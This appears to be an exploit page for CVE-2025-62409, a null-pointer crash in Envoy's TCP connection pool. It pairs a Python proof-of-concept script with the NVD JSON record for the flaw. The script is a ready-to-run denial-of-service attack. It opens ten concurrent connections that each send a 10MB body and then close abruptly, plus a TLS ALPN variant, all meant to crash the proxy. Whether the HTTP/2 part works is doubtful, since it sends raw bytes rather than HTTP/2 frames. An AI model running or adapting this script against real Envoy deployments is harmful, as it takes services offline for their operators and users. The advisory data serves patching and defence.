CVE-2025-62409

# CVE-2025-62409 PoC - Envoy TCP Connection Pool Crash via Null Pointer Dereference # This PoC demonstrates triggering the buffer watermark callback nullptr reference # by sending large requests/responses during connection closing with upstream data still flowing. import socket import ssl import threading import time TARGET_HOST = "127.0.0.1" TARGET_PORT = 10000 # Envoy listener port BUFFER_SIZE = 65536 LARGE_PAYLOAD_SIZE = 10 * 1024 * 1024 # 10MB to trigger flow control issues def send_large_data_then_close(): """ Establishes a connection to Envoy, sends a large payload, then abruptly closes while data is still being processed upstream. This triggers the buffer watermark callback nullptr dereference. """ try: # Create raw TCP connection (HTTP/1.x over ALPN-negotiated connection) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((TARGET_HOST, TARGET_PORT)) # Send HTTP/1.1 request with large body to trigger flow control request = ( f"POST /upload HTTP/1.1\r\n" f"Host: {TARGET_HOST}\r\n" f"Content-Length: {LARGE_PAYLOAD_SIZE}\r\n" f"Connection: close\r\n" f"\r\n" ).encode() sock.send(request) # Send large payload in chunks while connection is closing chunk = b"A" * BUFFER_SIZE sent = 0 while sent < LARGE_PAYLOAD_SIZE: try: sock.send(chunk) sent += len(chunk) except (BrokenPipeError, ConnectionResetError): # Connection closing while data still flowing - triggers the bug break # Force close to create the race condition sock.close() print(f"[+] Sent {sent} bytes, connection closed abruptly") except Exception as e: print(f"[-] Connection error: {e}") def trigger_http2_mixed(): """ Triggers the vulnerability via HTTP/1.x & HTTP/2 mixed ALPN scenario. """ try: context = ssl.create_default_context() context.set_alpn_protocols(['h2', 'http/1.1']) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock = context.wrap_socket(sock, server_hostname=TARGET_HOST) sock.settimeout(10) sock.connect((TARGET_HOST, TARGET_PORT)) # Send large response-like data to trigger watermark issue large_data = b"X" * (5 * 1024 * 1024) sock.send(large_data) time.sleep(0.001) # Race condition window sock.close() print("[+] ALPN mixed scenario triggered") except Exception as e: print(f"[-] ALPN scenario error: {e}") if __name__ == "__main__": print("[*] CVE-2025-62409 PoC - Envoy TCP Connection Pool Crash") print(f"[*] Target: {TARGET_HOST}:{TARGET_PORT}") # Launch multiple concurrent connections to increase crash probability threads = [] for i in range(10): t = threading.Thread(target=send_large_data_then_close) threads.append(t) t.start() time.sleep(0.1) # Also trigger HTTP/2 mixed scenario t = threading.Thread(target=trigger_http2_mixed) threads.append(t) t.start() for t in threads: t.join() print("[*] PoC execution complete. Check Envoy logs for crash.")

{"cve": {"id": "CVE-2025-62409", "sourceIdentifier": "[email protected]", "published": "2025-10-16T18:15:39.583", "lastModified": "2025-10-29T19:55:48.173", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Envoy is a cloud-native, open source edge and service proxy. Prior to 1.36.1, 1.35.5, 1.34.9, and 1.33.10, large requests and responses can potentially trigger TCP connection pool crashes due to flow control management in Envoy. It will happen when the connection is closing but upstream data is still coming, resulting in a buffer watermark callback nullptr reference. The vulnerability impacts TCP proxy and HTTP 1 & 2 mixed use cases based on ALPN. This vulnerability is fixed in 1.36.1, 1.35.5, 1.34.9, and 1.33.10."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.33.11", "matchCriteriaId": "3F5DCDFD-15E5-41FF-B3C8-65B562364BBB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.34.0", "versionEndExcluding": "1.34.9", "matchCriteriaId": "451649E4-695B-43C3-BC66-62BDC52B4D34"}, {"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.35.0", "versionEndExcluding": "1.35.5", "matchCriteriaId": "F77D99D7-F2B2-438A-921B-BDBD695FDF0E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:1.36.0:*:*:*:*:*:*:*", "matchCriteriaId": "8E599909-9956-454A-B1A3-E550188B27CD"}]}]}], "references": [{"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-pq33-4jxh-hgm3", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-pq33-4jxh-hgm3", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Vendor Advisory"]}]}}